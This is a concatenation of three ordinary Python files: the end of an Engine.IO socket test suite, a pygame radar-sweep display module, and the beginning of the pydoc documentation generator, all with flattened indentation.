s.send(pkt1)
s.send(pkt2)
self.assertEqual(s.poll(), [pkt1, pkt2])
def test_ping_pong(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.PING, data='abc'))
r = s.poll()
self.assertEqual(len(r), 1)
        self.assertEqual(r[0].encode(), b'3abc')
def test_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(ValueError, s.receive, packet.Packet(packet.OPEN))
def test_timeout(self):
mock_server = self._get_mock_server()
mock_server.ping_interval = -0.1
s = socket.Socket(mock_server, 'sid')
s.last_ping = time.time() - 1
s.close = mock.MagicMock()
s.send('packet')
s.close.assert_called_once_with(wait=False, abort=True)
def test_polling_read(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
packets = s.handle_get_request(environ, start_response)
self.assertEqual(packets, [pkt1, pkt2])
def test_polling_read_error(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
self.assertRaises(IOError, s.handle_get_request, environ,
start_response)
def test_polling_write(self):
mock_server = self._get_mock_server()
mock_server.max_http_buffer_size = 1000
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
s.handle_post_request(environ)
self.assertEqual(s.receive.call_count, 2)
def test_polling_write_too_large(self):
mock_server = self._get_mock_server()
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
mock_server.max_http_buffer_size = len(p) - 1
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
self.assertRaises(ValueError, s.handle_post_request, environ)
def test_upgrade_handshake(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
s._upgrade_websocket = mock.MagicMock()
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo',
'HTTP_CONNECTION': 'Foo,Upgrade,Bar',
'HTTP_UPGRADE': 'websocket'}
start_response = mock.MagicMock()
s.handle_get_request(environ, start_response)
s._upgrade_websocket.assert_called_once_with(environ, start_response)
def test_upgrade(self):
mock_server = self._get_mock_server()
mock_server.async.has_websocket = True
mock_server.async.wrap_websocket = mock.MagicMock()
mock_ws = mock.MagicMock()
mock_server.async.wrap_websocket.configure_mock(
return_value=mock_ws)
s = socket.Socket(mock_server, 'sid')
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server.async.wrap_websocket.assert_called_once_with(
s._websocket_handler)
mock_ws.assert_called_once_with(environ, start_response)
def test_upgrade_twice(self):
mock_server = self._get_mock_server()
mock_server.async.has_websocket = True
mock_server.async.wrap_websocket = mock.MagicMock()
s = socket.Socket(mock_server, 'sid')
s.upgraded = True
environ = "foo"
start_response = "bar"
self.assertRaises(IOError, s._upgrade_websocket,
environ, start_response)
def test_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.UPGRADE))
r = s.poll()
self.assertEqual(len(r), 1)
        self.assertEqual(r[0].encode(), b'6')
def test_upgrade_no_probe(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
ws = mock.MagicMock()
ws.wait.return_value = packet.Packet(packet.NOOP).encode(
always_bytes=False)
s._websocket_handler(ws)
self.assertFalse(s.upgraded)
def test_upgrade_no_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
ws = mock.MagicMock()
probe = six.text_type('probe')
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.NOOP).encode(always_bytes=False)]
s._websocket_handler(ws)
ws.send.assert_called_once_with(packet.Packet(
packet.PONG, data=probe).encode(always_bytes=False))
self.assertEqual(s.queue.get().packet_type, packet.NOOP)
self.assertFalse(s.upgraded)
def test_websocket_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
time.sleep(0)
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', 'foo'),
mock.call('disconnect', 'sid')])
ws.send.assert_called_with('4bar')
def test_websocket_read_write_fail(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
RuntimeError]
ws.send.side_effect = [None, RuntimeError]
s._websocket_handler(ws)
time.sleep(0)
self.assertEqual(s.closed, True)
def test_websocket_ignore_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.OPEN).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
time.sleep(0)
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', foo),
mock.call('disconnect', 'sid')])
ws.send.assert_called_with('4bar')
def test_send_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
self.assertRaises(IOError, s.send, packet.Packet(packet.NOOP))
def test_close_and_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=True)
s.queue.join.assert_called_once_with()
def test_close_without_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=False)
self.assertEqual(s.queue.join.call_count, 0)
|
radar.py
|
"""
Martin O'Hanlon
www.stuffaboutcode.com
Pygame radar
Attribution:
Some radar code - http://simpson.edu/computer-science/
Circle on line equation - http://codereview.stackexchange.com/questions/86421/line-segment-to-circle-collision-algorithm
"""
import pygame
import math
import threading
BLACK = (0, 0, 0)
GREEN = (0, 255, 0)
class Radar(threading.Thread):
def __init__(self, screen, radar_rect, radar_pos = (0, 0), scale = 1,
back_col = BLACK, radar_col = GREEN):
#setup threading
threading.Thread.__init__(self)
self.screen = screen
self.radar_rect = radar_rect
self.centre = (radar_rect[0] + (radar_rect[2] / 2),
radar_rect[1] + (radar_rect[3] / 2))
self.sweeplen = (radar_rect[2] / 2)
self.radar_pos = radar_pos
self.scale = scale
self.back_col = back_col
self.radar_col = radar_col
self.running = False
self.stopped = True
self.dots = {}
def run(self):
self.running = True
self.stopped = False
angle = 0
#TODO - set the back of the radar to the back colour
while not self.stopped:
# Calculate the x,y for the end point of our 'sweep' based on the current angle
x = self.centre[0] + math.sin(angle) * self.sweeplen
y = self.centre[1] + math.cos(angle) * self.sweeplen
# Draw the line from the center at 145, 145 to the calculated end spot
pygame.draw.line(self.screen, self.radar_col, [self.centre[0], self.centre[1]], [x, y], 2)
self._display_dots_on_line(self.centre[0], self.centre[1], x, y)
# Draw the outline of a circle to 'sweep' the line around
pygame.draw.ellipse(self.screen, self.radar_col, self.radar_rect, 2)
#update the display, wait for the next frame
pygame.display.update()
pygame.time.Clock().tick(60)
#redraw the line in black to clear it
pygame.draw.line(self.screen, self.back_col, [self.centre[0], self.centre[1]], [x, y], 2)
# Increase the angle by 0.03 radians
angle = angle + .03
# If we have done a full sweep, reset the angle to 0
if angle > 2 * math.pi:
angle = angle - 2 * math.pi
self.running = False
def stop(self):
self.stopped = True
#stop the dots
for key, dot in self.dots.items():
dot.stop()
        #wait until it's stopped
while(self.running):
pygame.time.wait(10)
def dot_add(self, dot_id, x, y, data = None, back_col = None, dot_col = None):
        if back_col is None: back_col = self.back_col
        if dot_col is None: dot_col = self.radar_col
#work out x, y on screen
screen_x, screen_y = self._calc_screen_x_y(x, y)
#does the dot already exist?
if dot_id in self.dots:
dot = self.dots[dot_id]
dot.move(screen_x, screen_y)
else:
dot = RadarDot(self.screen, screen_x, screen_y, 10, data = data, back_col = back_col, dot_col = dot_col)
self.dots[dot_id] = dot
def dot_remove(self, dot_id):
if dot_id in self.dots:
del self.dots[dot_id]
def dot_move(self, dot_id, x, y):
screen_x, screen_y = self._calc_screen_x_y(x, y)
self.dots[dot_id].move(screen_x, screen_y)
def dot_move_by(self, dot_id, x, y):
self.dots[dot_id].move_by(x, y)
def _calc_screen_x_y(self, x, y):
diff_x = (x - self.radar_pos[0]) * self.scale
diff_y = (y - self.radar_pos[1]) * self.scale
screen_x = int(round(self.centre[0] + diff_x, 0))
screen_y = int(round(self.centre[1] + diff_y, 0))
return screen_x, screen_y
def _display_dots_on_line(self, x1, y1, x2, y2):
for key, dot in self.dots.copy().items():
if dot.fade_step == 0 or dot.fade_step > 50:
intersect, pos = dot.on_line(x1, y1, x2, y2)
if intersect == True:
dot.show()
def dot_at_point(self, point):
dot_found = None
for key, dot in self.dots.copy().items():
if dot.rect.collidepoint(point):
dot_found = key
return dot_found
def set_scale(self, new_scale):
self.scale = new_scale
for key, dot in self.dots.copy().items():
self.dot_move(key, dot.x, dot.y)
class RadarDot():
def __init__(self, screen, x, y, radius,
back_col = BLACK, dot_col = GREEN,
fade_time = 4000, no_of_fade_steps = 100, data = None):
self.screen = screen
self.radius = radius
self.move(x, y)
self.back_col = back_col
self.dot_col = dot_col
self.fade_time = fade_time
self.no_of_fade_steps = no_of_fade_steps
self.fade_step = 0
self.fade_running = False
self.data = data
def show(self):
#if the fade is running
if self.fade_running:
#reset the fade
self.fade_step = 0
else:
#start the fade again
self.fade_thread = threading.Thread(target = self._fade)
self.fade_thread.start()
def _fade(self):
#calc fade steps
fade_steps = self._calc_fade(self.dot_col, self.back_col, self.no_of_fade_steps)
fade_delay = int(self.fade_time / self.no_of_fade_steps)
        #keep fading the dot until it disappears or it's stopped
now = pygame.time.get_ticks()
self.fade_step = 0
self.fade_running = True
        #keep fading the dot until it reaches the back colour or it's stopped
while self.fade_step < (len(fade_steps) - 1) and self.fade_running == True:
#where am i drawing the dot this time?
lastx, lasty = self.x, self.y
pygame.draw.ellipse(self.screen,
fade_steps[self.fade_step],
(lastx - self.radius, lasty - self.radius, self.radius, self.radius), 0)
#pygame.display.update()
#wait until the next time or the fade is stopped
till = now + fade_delay
while till > pygame.time.get_ticks() and self.fade_running == True:
pygame.time.wait(10)
now = till
#draw over the last ellipse in black
pygame.draw.ellipse(self.screen,
self.back_col,
(lastx - self.radius, lasty - self.radius, self.radius, self.radius), 0)
self.fade_step += 1
self.fade_running = False
#pygame.display.update()
def move(self, x, y):
self.x = x
self.y = y
self.rect = pygame.Rect(self.x - self.radius, self.y - self.radius, self.radius, self.radius)
def move_by(self, x, y):
self.move(self.x + x, self.y + y)
def _calc_fade(self, start_rgb, end_rgb, steps):
#work out the number of colours and steps
r_step = (end_rgb[0] - start_rgb[0]) / steps
g_step = (end_rgb[1] - start_rgb[1]) / steps
b_step = (end_rgb[2] - start_rgb[2]) / steps
rgb_steps = []
rgb_steps.append(start_rgb)
for step in range(1, steps):
last_rgb = rgb_steps[step - 1]
this_rgb = (last_rgb[0] + r_step,
last_rgb[1] + g_step,
last_rgb[2] + b_step)
rgb_steps.append(this_rgb)
rgb_steps.append(end_rgb)
return rgb_steps
def stop(self):
#if the fade is running, stop it
if self.fade_running:
self.fade_running = False
self.fade_thread.join()
def on_line(self, x1, y1, x2, y2):
Q = pygame.math.Vector2(self.x, self.y)
r = self.radius
P1 = pygame.math.Vector2(x1, y1)
V = pygame.math.Vector2(x2, y2) - P1
a = V.dot(V)
b = 2 * V.dot(P1 - Q)
c = P1.dot(P1) + Q.dot(Q) - 2 * P1.dot(Q) - r**2
disc = b**2 - 4 * a * c
if disc < 0:
return False, None
sqrt_disc = math.sqrt(disc)
t1 = (-b + sqrt_disc) / (2 * a)
t2 = (-b - sqrt_disc) / (2 * a)
if not (0 <= t1 <= 1 or 0 <= t2 <= 1):
return False, None
t = max(0, min(1, - b / (2 * a)))
return True, P1 + t * V
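    # Background for on_line above (a sketch of the maths, following the Stack
    # Exchange reference in the module docstring): a point on the sweep segment
    # is P(t) = P1 + t*V for t in [0, 1]; substituting it into the circle
    # equation |P(t) - Q|**2 = r**2 gives the quadratic
    #     (V.V)*t**2 + 2*V.(P1 - Q)*t + (|P1 - Q|**2 - r**2) = 0,
    # i.e. exactly the a, b and c computed above. A non-negative discriminant
    # with a root in [0, 1] means the sweep line currently crosses the dot.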
if __name__ == "__main__":
pygame.init()
# Set the height and width of the screen
SIZE = [600, 600]
BORDER = 10
#create the screen
screen = pygame.display.set_mode(SIZE)
# Set the screen background
screen.fill(BLACK)
# Dimensions and location of radar sweep
radar_rect = [BORDER, BORDER, SIZE[0] - (BORDER * 2), SIZE[1] - (BORDER * 2)]
radar = Radar(screen, radar_rect)
radar.start()
radar.dot_add(1, -200, -200)
radar.dot_add(2, 200, 200)
radar.dot_add(3, -200, 250)
# Loop until the user clicks the close button.
done = False
while not done:
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
pygame.time.wait(75)
radar.dot_move_by(1, 1, 1.5)
radar.dot_move_by(2, -1.4, -1)
radar.dot_move_by(3, 0, -1.5)
radar.stop()
pygame.quit()
|
pydoc.py
|
#! /usr/bin/python3.2
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on the given port on the
local machine. Port number 0 can be used to get an arbitrary unused port.
Run "pydoc -b" to start an HTTP server on an arbitrary unused port and
open a Web browser to interactively browse documentation. The -p option
can be used with the -b option to explicitly specify the server port.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it. This option is
deprecated, since the server can now be controlled directly from HTTP
clients.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
/usr/share/doc/pythonX.Y/html/library
if the pythonX.Y-doc package is installed or in
http://docs.python.org/X.Y/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__all__ = ['help']
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision$"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import builtins
import imp
import inspect
import io
import os
import pkgutil
import platform
import re
import sys
import time
import tokenize
import warnings
from collections import deque
from reprlib import Repr
from traceback import extract_tb, format_exception_only
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', result.rstrip()) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = doc.strip().split('\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not lines[1].rstrip():
return lines[0], '\n'.join(lines[2:])
return '', '\n'.join(lines)
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = pairs[1].join(text.split(pairs[0]))
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
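# Illustrative checks for the two helpers above (not part of the original
# module): replace('a<b', '<', '&lt;') returns 'a&lt;b', and
# cram('abcdefghij', 8) returns 'ab...hij'.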
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__',
'__cached__', '__author__', '__credits__', '__date__',
'__version__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return True
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
results = []
for (name, kind, cls, value) in inspect.classify_class_attrs(object):
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
results.append((name, kind, cls, value))
return results
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not line.strip():
line = file.readline()
if not line: break
line = line.strip()
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not line.strip():
line = file.readline()
if not line: break
result = line.split('"""')[0].strip()
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = tokenize.open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
self.filename = filename
self.exc, self.value, self.tb = exc_info
def __str__(self):
exc = self.exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
with open(path, 'rb') as file:
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.seek(0)
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Remove the module from sys.modules and re-import to try
# and avoid problems with partially loaded modules.
# Also remove any submodules because they won't appear
# in the newly loaded module's namespace if they're already
# in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in path.split('.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
PYTHONDOCS = os.environ.get("PYTHONDOCS",
"http://docs.python.org/%d.%d/library"
% sys.version_info[:2])
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError(message)
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS", self.PYTHONDOCS)
basedir = os.path.join(sys.exec_prefix, "lib",
"python%d.%d" % sys.version_info[:2])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'_thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'dist-packages')) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(text.expandtabs())
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, modpkginfo):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = modpkginfo
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
